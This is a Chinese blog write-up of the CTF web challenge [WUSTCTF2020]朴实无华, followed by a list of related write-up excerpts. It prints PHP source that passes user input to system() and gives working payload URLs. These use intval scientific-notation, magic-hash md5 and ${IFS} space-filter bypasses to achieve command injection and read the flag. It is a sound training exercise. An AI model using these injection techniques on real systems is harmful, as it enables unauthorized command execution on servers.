代码编织梦想

在这里插入图片描述
首先在robots.txt下发现/fAke_f1agggg.php

在这里插入图片描述
访问有一个假的flag,但是在响应头中找到一个提示,另外还有一个值得注意的是这里是PHP/5.5.38

在这里插入图片描述
访问fl4g.php得到

<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);


//level 1
if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
    }else{
        die("金钱解决不了穷人的本质问题");
    }
}else{
    die("去非洲吧");
}
//level 2
if (isset($_GET['md5'])){
   $md5=$_GET['md5'];
   if ($md5==md5($md5))
       echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
   else
       die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
    die("去非洲吧");
}

//get flag
if (isset($_GET['get_flag'])){
    $get_flag = $_GET['get_flag'];
    if(!strstr($get_flag," ")){
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
        echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
        system($get_flag);
    }else{
        die("快到非洲了");
    }
}else{
    die("去非洲吧");
}
?> 

PHP5中的intval()函数中科学计数法符号e无效,只会当作正常字符处理

PS D:\phpstudy_pro\Extensions\php\php5.5.9nts> .\php.exe -v
PHP 5.5.9 (cli) (built: Feb  5 2014 11:04:12)
Copyright (c) 1997-2014 The PHP Group
Zend Engine v2.5.0, Copyright (c) 1998-2014 Zend Technologies
PS D:\phpstudy_pro\Extensions\php\php5.5.9nts> .\php.exe -r "var_dump(intval('2e4'));"
int(2)
PS D:\phpstudy_pro\Extensions\php\php5.5.9nts> php -v
PHP 7.4.3 (cli) (built: Feb 18 2020 17:29:57) ( NTS Visual C++ 2017 x64 )
Copyright (c) The PHP Group
Zend Engine v3.4.0, Copyright (c) Zend Technologies
    with Zend OPcache v7.4.3, Copyright (c), by Zend Technologies
    with Xdebug v2.9.8, Copyright (c) 2002-2020, by Derick Rethans
PS D:\phpstudy_pro\Extensions\php\php5.5.9nts> php -r "var_dump(intval('2e4'));"
Command line code:1:
int(20000)
PS D:\phpstudy_pro\Extensions\php\php5.5.9nts>

所以这里利用科学计数法的符号就可以绕过level 1

level 2直接可参考我的这篇文章:浅谈PHP中哈希比较缺陷问题及哈希强比较相关问题

最后直接绕过空格cat即可

/fl4g.php?num=2e4&md5=0e215962017&get_flag=ls${IFS}-lha${IFS}./
/fl4g.php?num=2e4&md5=0e215962017&get_flag=tail${IFS}./fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag

在这里插入图片描述

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mochu7777777/article/details/125450367

BUUCTF刷题记录(5)-爱代码爱编程

文章目录 web[GXYCTF2019]BabyUpload[网鼎杯 2018]Comment[RoarCTF 2019]Simple Upload[NCTF2019]Fake XML cookbook[极客大挑战 2019]RCE MEbestphp's revenge(未完成)[WUSTCTF2020]朴实无华[WUSTCTF2020]颜值成绩

Buuctf -web wp汇总(三)-爱代码爱编程

Buuctf -web wp汇总(一):链接 Buuctf -web wp汇总(二):链接 Buuctf -web wp汇总(三):链接 文章目录 [WUSTCTF2020]朴实无华[WUSTCTF2020]颜值成绩查询[GKCTF2020]EZ三剑客-EzWeb[CISCN2019 华北赛区 Day1 Web5]CyberPunk[V

buu做题笔记——[WUSTCTF2020]朴实无华&[BSidesCF 2020]Had a bad day-爱代码爱编程

BUU [WUSTCTF2020]朴实无华robots.txtresponselevel 1level 2level 3[BSidesCF 2020]Had a bad day [WUSTCTF2020]朴实无华 robots.txt 进入题目界面就一个Hack me,抓包也没看到啥有用的。dirsearch开启 ! 扫一扫有没有什么有用

BUUCTF [WUSTCTF2020] 朴实无华-爱代码爱编程

BUUCTF [WUSTCTF2020] 朴实无华 考点: intval()函数科学计数法绕过网页Unicode编码变量md5()加密后与原值相等nl、tac等替代cat命令启动靶机: 根据标签名: <title>人间极乐bot</title> 猜测可能有robots.txt协议,访问: 得到假的flag: 根据

BUUCTF 28-爱代码爱编程

知识点 robots.txt: robots.txt置于网站的跟目录下。爬虫根据此文件决定网站下的哪些页面是被授权抓取的。 intval() 函数 语法:int intval ( mixed $var [, int $base = 10 ] )参数:作用: 28-1 [WUSTCTF2020]朴实无华 做题思路 原谅我看见这个毫无头绪,由

第五十四题——[WUSTCTF2020]朴实无华-爱代码爱编程

题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,访问/robots.txt文件看到提示/fAke_f1agggg.php 第二步:访问/fAke_f1agggg.php,看到提示:/fl4g.php 第三步:访问/fl4g.php看到源码 <?php header('Content-type

buuctf web [WUSTCTF2020]朴实无华-爱代码爱编程

robots.txt找找看有没有东西 抓个包可以发现/fl4g.php 响应头也可以发现 因为buuctf编码有问题所以我找了其他的 <?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); //不输出报错 highlight_file(__file__);

BUUCTF之[WUSTCTF2020]朴实无华 --------------- MD5碰撞-爱代码爱编程

启动挑战页面 访问一下robots.txt看看有没有什么提示 发现有个可疑的链接:/fAke_f1agggg.php 到这里就可以看到重要的源码了 <img src="/img.jpg"> <?php header('Content-type:text/html;charset=utf-8'); error_reporting(0

buuctf-[WUSTCTF2020]朴实无华(小宇特详解)-爱代码爱编程

buuctf-[WUSTCTF2020]朴实无华(小宇特详解) 1.这里先看题目 2.然后去查看一下robots.txt,看一下爬虫规则。 3.提示是/fAke_f1agggg.php,这里访问并查看f12的网络 这里发现了/fl4g.php的提示,尝试访问 4.访问/fl4g.php,这里如果出现乱码问题请参考我的文章 (1条消息

BUUCTF web(八)-爱代码爱编程

[WUSTCTF2020]朴实无华 robots.txt发现提示,抓包/fAke_f1agggg.php,发现 访问/fl4g.php <?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); //le

web buuctf [WUSTCTF2020]朴实无华-爱代码爱编程

1. 根据提示消息应该在头部 2.查看robots.txt (搜索引擎中访问网站的时候要查看的第一个文件) 访问   3.根据头部查看请求头和响应头   4.查看,打开网页里面对汉字的编译是乱码 ,在火狐浏览器中定制工具里有一个页面编辑的选项,对页面进行编辑,得到源码: <?php header('Content-type:t

BUUCTF(4)-爱代码爱编程

[BSidesCF 2020]Had a bad day 1 点击按钮会出现对应的参数和图片,尝试直接读取文件 发现用伪协议读取直接读取index.php的时候有反应,从前面报错可以看出来它会自带.php,所以只需要输入index即可 ?category=php://filter/read=convert.base64-encode/resou

[WUSTCTF2020]朴实无华 1-爱代码爱编程

[WUSTCTF2020]朴实无华 1 进入环境,什么也没有得到,估计就是需要我们进行目录扫描了 用dirsearch进行把爆破扫描 环境的问题,很多的环境在进行扫描的时候,如果访问过快,就会返回429 ,建议将线程数调小,否则会出现文件 429请况,影响结果 dirsearch.py -e bak,zip,tgz,txt -u http

[wustctf2020]朴实无华_甜筒化了 -的博客-爱代码爱编程

[WUSTCTF2020]朴实无华 打开靶机:访问/var/www/html/index.php无果,试试robots.txt,得到/fAke_f1agggg.php目录。 访问该目录提示flag不在该目录下,F12网络请求中给了/fl4g.php目录。 访问/fl4g.php目录,进行代码审计(火狐浏览器修复乱码:菜单->更多工具->

buuctf web3_buuctf逻辑漏洞-爱代码爱编程

目录 [WUSTCTF2020]朴实无华 [安洵杯 2019]easy_serialize_php ASIS 2019]Unicorn shop  [CISCN 2019 初赛]Love Math [WesternCTF2018]shrine [网鼎杯 2020 朱雀组]Nmap [SWPU2019]Web1 [MRCTF2020]PYWe

【buuctf】[wustctf2020]朴实无华-爱代码爱编程

为什么打开robots.txt,一是看见源码中有提示,二是应该在没有思路时作为常规操作 显示flag也不会在里面 打开这个文件,看见源码 <img src="/img.jpg"> <?php hea